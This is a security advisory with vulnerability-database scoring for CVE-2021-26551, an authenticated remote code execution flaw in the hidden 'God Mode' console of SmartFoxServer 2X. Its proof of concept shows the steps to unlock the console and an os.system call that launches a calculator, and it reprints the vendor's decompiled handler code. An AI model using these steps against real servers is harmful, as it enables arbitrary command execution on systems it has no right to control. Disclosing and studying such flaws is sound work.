Gjoko KrsticZSL-2021-5628SmartFoxServer 2X 2.17.0 God Mode Console Remote Code Execution
6 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.096 Low
EPSS
Percentile
94.8%
Title: SmartFoxServer 2X 2.17.0 God Mode Console Remote Code Execution
Advisory ID: ZSL-2021-5628
Type: Local/Remote
Impact: System Access, DoS
Risk: (3/5)
Release Date: 07.02.2021
Summary
SmartFoxServer (SFS) is a comprehensive SDK for rapidly developing multiplayer games and applications with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal Windows Platform, Android, Java, C++ and more. SmartFoxServer comes with a rich set of features, an impressive documentation set, tens of examples with their source, powerful administration tools and a very active support forum. Born in 2004, and evolving continuously since then, today SmartFoxServer is the leading middleware to create large scale multiplayer games, MMOs and virtual communities. Thanks to its simplicity of use, versatility and performance, it currently powers hundreds of projects all over the world, from small chats and turn-based games to massive virtual worlds and realtime games.
Description
An authenticated attacker can execute remote arbitrary Python code after enabling and unlocking the undocumented console module.
Vendor
gotoAndPlay() - <https://www.smartfoxserver.com>
Affected Version
Server: 2.17.0
Remote Admin: 3.2.6
SmartFoxServer 2X, Pro, Basic
Tested On
Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vendor Status
[29.01.2021] Vulnerability discovered.
[29.01.2021] Asked vendor about the console module, how to enable it.
[30.01.2021] No response.
[31.01.2021] Vendor contacted.
[01.02.2021] Vendor asks more details.
[01.02.2021] Sent details to the vendor.
[01.02.2021] Vendor responds.
[01.02.2021] Replied to the vendor, asking for a plan.
[03.02.2021] Vendor will fix the Credentials Disclosure. Other issues are working as expected.
[07.02.2021] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26551>
[2] <https://nvd.nist.gov/vuln/detail/CVE-2021-26551>
[3] <https://www.exploit-db.com/exploits/49526>
[4] <https://cxsecurity.com/issue/WLB-2021020027>
[5] <https://packetstormsecurity.com/files/161340/>
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/196353>
[7] <https://www.tenable.com/cve/CVE-2021-26551>
Changelog
[07.02.2021] - Initial release
[10.02.2021] - Added reference [3], [4], [5], [6] and [7]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>SmartFoxServer 2X 2.17.0 God Mode Console Remote Code Execution
Vendor: gotoAndPlay()
Product web page: https://www.smartfoxserver.com
Affected version: Server: 2.17.0
Remote Admin: 3.2.6
SmartFoxServer 2X, Pro, Basic
Summary: SmartFoxServer (SFS) is a comprehensive SDK for
rapidly developing multiplayer games and applications
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
Windows Platform, Android, Java, C++ and more. SmartFoxServer
comes with a rich set of features, an impressive
documentation set, tens of examples with their source,
powerful administration tools and a very active support
forum. Born in 2004, and evolving continuously since
then, today SmartFoxServer is the leading middleware to
create large scale multiplayer games, MMOs and virtual
communities. Thanks to its simplicity of use, versatility
and performance, it currently powers hundreds of projects
all over the world, from small chats and turn-based games
to massive virtual worlds and realtime games.
Desc: An authenticated attacker can execute remote arbitrary
Python code after enabling and unlocking the undocumented
console module.
Tested on: Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5628
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5628.php
CVE ID: CVE-2021-26551
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26551
NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2021-26551
29.01.2021
--
------------------------------------------------------
Undocumented functionality in software
#INABIAF (https://en.wikipedia.org/wiki/Undocumented_feature)
See also:
- Backdoor (computing)
- Easter egg (media)
God Mode Console (Console Module) unlock instructions:
------------------------------------------------------
$ pwd
/config/admin
$ vi /admintool.xml # Uncomment <module description="Interact with the SmartFoxServer instance via command line" id="Console" name="Console"></module>
$ cd .. ;pwd
/config
$ touch ConsoleModuleUnlock.txt
Mac/Windows PoC:
----------------
GET http://localhost:8080/admin/modules/console.html HTTP/1.1
--------------------------------------
ADMIN_CONSOLE, version 3.0.0
--------------------------------------
Type help() for assistance.
> help()
zm SFSZoneManager
sfs SmartFoxServer
um SFSUserManager
api SFSApi
bum SFSBannedUserManager
xm SFSExtensionManager
eng BitSwarmEngine
sm DefaultSessionManager
extras() For more custom function calls
shortcuts() For keyboard shortcuts details
> eng
com.smartfoxserver.bitswarm.core.BitSwarmEngine@3823acc4
> extras()
version(): Shows the Console extension version
reloadScripts(): Reload the dynamic server scripts
execute(): Launches the last loaded script again
files(path): Shows the files at the specified path
controller(id): Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher
zones(): List of active zones
> version()
2.0.1
> files(".") # Win64
['config', 'data', 'extensions', 'lib', 'logs', 'sfs2x-service.exe', 'sfs2x-service.vmoptions', 'sfs2x-standalone.exe', 'sfs2x-standalone.vmoptions', 'sfs2x.bat', 'www', 'zones']
> files(".") # MacOS
['zones', 'config', 'www', 'extensions', 'logs', 'lib', 'sfs2x-service.vmoptions', 'sfs2x-standalone.vmoptions', 'sfs2x.-standalone', 'data', 'sfs2x-service']
> import os
> os.name
java
> os.system("C:\\windows\\system32\\calc.exe") # Win64
1
> import popen2
> os.popen2("""osascript -e 'tell app "Calculator" to open'""") # MacOS
1
>
gmc.py:
-------
#
# _____ _____ ____ _____ _____ ____ _____
# | __| | \ | | | \| __|
# | | | | | | | | | | | | | | | __|
# |_____|_____|____/ |_|_|_|_____|____/|_____|
# _____ _____ _____ _____ _____ __ _____
# | | | | | __| | | | __|
# | --| | | | | |__ | | | |__| __|
# |_____|_____|_|___|_____|_____|_____|_____|
#
# SmartFoxServer2X Admin Console Scripts
#
# (c) 2012-2016 gotoAndPlay()
# @author Marco Lapi
#
# Version 2.x
#
# Python Imports
import types
import sys
#
# This global variable allows to lock the Console so that it can't be misused
#
__CONSOLE_LOCK = False
# Java Imports
import java
from com.smartfoxserver.v2.entities.data import *
__scripts = [
{'name':'version()', 'doc':'Shows the Console extension version'},
{'name':'reloadScripts()', 'doc':'Reload the dynamic server scripts'},
{'name':'execute()', 'doc':'Launches the last loaded script again'},
{'name':'files(path)', 'doc':'Shows the files at the specified path'},
{'name':'controller(id)', 'doc':'Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher'},
{'name':'zones()', 'doc':'List of active zones'}
...
...
javashell.py:
-------------
# override defaults based on osType
if osType == "nt":
shellCmd = ["cmd", "/c"]
envCmd = "set"
envTransform = string.upper
elif osType == "dos":
shellCmd = ["command.com", "/c"]
envCmd = "set"
envTransform = string.upper
elif osType == "posix":
shellCmd = ["sh", "-c"]
envCmd = "env"
elif osType == "mac":
curdir = ':' # override Posix directories
pardir = '::'
elif osType == "None":
pass
# else:
# # may want a warning, but only at high verbosity:
# __warn( "Unknown os type '%s', using default behavior." % osType )
return _ShellEnv( shellCmd, envCmd, envTransform )
com--|
|--smartfoxserver--|
|--v2--|
|--admin--|
|--handlers--|
|--requests--|
|--ConsoleModuleReqHandler.java:
---------------------------------------------------------------------------------------------------
package com.smartfoxserver.v2.admin.handlers.requests;
import org.python.core.PyJavaInstance;
import org.python.core.PyException;
import com.smartfoxserver.v2.SmartFoxServer;
import java.io.IOException;
import org.apache.commons.io.FileUtils;
import java.io.File;
import com.smartfoxserver.bitswarm.core.BitSwarmEngine;
import org.python.core.PyString;
import org.python.core.Py;
import org.python.core.PySystemState;
import com.smartfoxserver.v2.entities.data.SFSObject;
import com.smartfoxserver.v2.extensions.ExtensionLogLevel;
import com.smartfoxserver.v2.entities.data.ISFSObject;
import com.smartfoxserver.v2.entities.User;
import org.python.core.PyObject;
import org.python.util.PythonInterpreter;
import com.smartfoxserver.v2.annotations.Instantiation;
import com.smartfoxserver.v2.annotations.MultiHandler;
@MultiHandler
@Instantiation(Instantiation.InstantiationMode.SINGLE_INSTANCE)
public class ConsoleModuleReqHandler extends BaseAdminModuleReqHandler
{
public static final String MODULE_ID = "Console";
public static final String VER = "2.0.1";
private static final String MODULE_UNLOCK_FILE = "ConsoleModuleUnlock.txt";
private static final String COMMANDS_PREFIX = "console";
private static final String FN_HINTS = "__hints__";
private static final String CONSOLE_LOCK = "__CONSOLE_LOCK";
private static final String CMD_RELOAD_SCRIPTS = "reloadScripts()";
private static final String SCRIPT_PATH = "config/admin/gmc/";
private static final String MAIN_SCRIPT = "gmc.py";
private static final String GRID_SCRIPT = "gmc-grid.py";
private final String REQ_CMD = "cmd";
private final String REQ_HINT = "hint";
private final String REQ_SCRIPT = "script";
private final String RES_ERROR_LOCKED = "locked";
protected PythonInterpreter runTime;
private PyObject fnGetHints;
private volatile boolean inited;
public ConsoleModuleReqHandler() {
super("console", "Console");
this.inited = false;
}
public void handleAdminRequest(final User sender, final ISFSObject params) {
if (!this.inited) {
this.init();
}
if (!this.isModuleUnlocked()) {
this.trace(ExtensionLogLevel.WARN, "Console module is locked. Request denied");
this.sendResponse("locked", (ISFSObject)new SFSObject(), sender);
return;
}
final String cmd = params.getUtfString("__[[REQUEST_ID]]__");
if (cmd.equals("cmd")) {
this.handleCommand(params, sender);
}
else if (cmd.equals("hint")) {
this.handleCodeHint(params, sender);
}
else if (cmd.equals("script")) {
this.handleScript(params, sender);
}
}
public synchronized void init() {
final String script = this.loadMainScript();
if (script == null) {
throw new RuntimeException("Cannot load AdminConsole's helper script! Plase reinstall this Extension making sure to follow the documentation step by step.");
}
this.runTime = new PythonInterpreter((PyObject)null, new PySystemState());
final PySystemState sys = Py.getSystemState();
sys.path.append((PyObject)new PyString("./extensions/"));
sys.path.append((PyObject)new PyString("./extensions/__lib__/AdminConsole/"));
this.runTime.set("sfs", (Object)this.sfs);
this.runTime.set("eng", (Object)BitSwarmEngine.getInstance());
this.runTime.set("api", (Object)this.sfs.getAPIManager().getSFSApi());
this.runTime.set("um", (Object)this.sfs.getUserManager());
this.runTime.set("zm", (Object)this.sfs.getZoneManager());
this.runTime.set("xm", (Object)this.sfs.getExtensionManager());
this.runTime.set("bum", (Object)this.sfs.getBannedUserManager());
this.runTime.set("sm", (Object)this.sfs.getSessionManager());
this.runTime.set("__parent__", (Object)this);
this.runTime.exec("_2XGlobals_ = {'sfs':sfs,'eng':eng,'api':api,'um':um,'zm':zm,'xm':xm,'bum':bum,'sm':sm}");
this.runTime.exec(script);
this.fnGetHints = this.runTime.get("__hints__");
this.inited = true;
}
private String loadMainScript() {
String script = null;
try {
script = FileUtils.readFileToString(new File("config/admin/gmc/gmc.py"));
}
catch (IOException ex) {}
if (SmartFoxServer.grid()) {
String gridScript = null;
try {
gridScript = FileUtils.readFileToString(new File("config/admin/gmc/gmc-grid.py"));
script = String.valueOf(script) + gridScript;
}
catch (IOException ex2) {}
}
return script;
}
private void handleCommand(final ISFSObject params, final User sender) {
PyException err = null;
final String cmd = params.getUtfString("c");
PyObject result = null;
ISFSObject response = null;
if (!cmd.equals("reloadScripts()")) {
this.checkConsoleLock();
}
try {
result = this.runTime.eval(cmd);
}
catch (PyException err3) {
try {
this.runTime.exec(cmd);
}
catch (PyException err2) {
err = err2;
}
}
if (result != null) {
String repr = null;
if (result instanceof PyJavaInstance) {
final Object o = ((PyJavaInstance)result).__tojava__((Class)Object.class);
repr = o.toString();
}
else {
repr = result.toString();
}
repr = this.checkHTML(repr);
response = (ISFSObject)new SFSObject();
response.putUtfString("r", repr);
}
else if (err != null) {
response = (ISFSObject)new SFSObject();
response.putUtfString("e", err.toString());
}
this.sendResponse("cmd", response, sender);
}
private void handleCodeHint(final ISFSObject params, final User sender) {
this.checkConsoleLock();
final String cmd = params.getUtfString("c");
try {
final PyObject pyObj = this.runTime.eval(cmd);
final PyObject res = this.fnGetHints.__call__(pyObj, (PyObject)new PyJavaInstance((Object)sender));
final SFSObject sfso = (SFSObject)res.__tojava__((Class)SFSObject.class);
this.sendResponse("hint", (ISFSObject)sfso, sender);
}
catch (PyException ex) {}
}
private void handleScript(final ISFSObject params, final User sender) {
this.checkConsoleLock();
final byte[] data = params.getByteArray("script");
final String scriptData = new String(data);
final ISFSObject response = (ISFSObject)new SFSObject();
try {
this.runTime.exec(scriptData);
final PyObject fnExecute = this.runTime.get("execute");
final PyObject res = fnExecute.__call__();
response.putUtfString("r", res.toString());
}
catch (PyException err) {
response.putUtfString("e", err.toString());
}
this.sendResponse("script", response, sender);
}
private String checkHTML(String data) {
if (data.indexOf(60) > -1 && data.indexOf("<span data='data.replaceAll("\\<",' data.replaceall="" return="">", ">");
}
return data;
}
private void checkConsoleLock() {
final Boolean locked = (Boolean)this.runTime.get("__CONSOLE_LOCK", (Class)Boolean.class);
if (locked) {
throw new IllegalStateException("Admin Console is locked.");
}
}
private boolean isModuleUnlocked() {
final File lock = new File("config/ConsoleModuleUnlock.txt");
return lock.exists();
}
}
</span></p></body></html>Related
6 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.096 Low
EPSS
Percentile
94.8%